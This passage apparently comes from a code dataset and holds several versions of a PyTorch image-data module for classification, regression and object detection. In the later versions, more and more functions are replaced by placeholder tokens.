self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n <function token>\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n <function token>\n\n def __len__(self):\n return len(self.data)\n <function token>\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n <function token>\n <function token>\n <function token>\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n 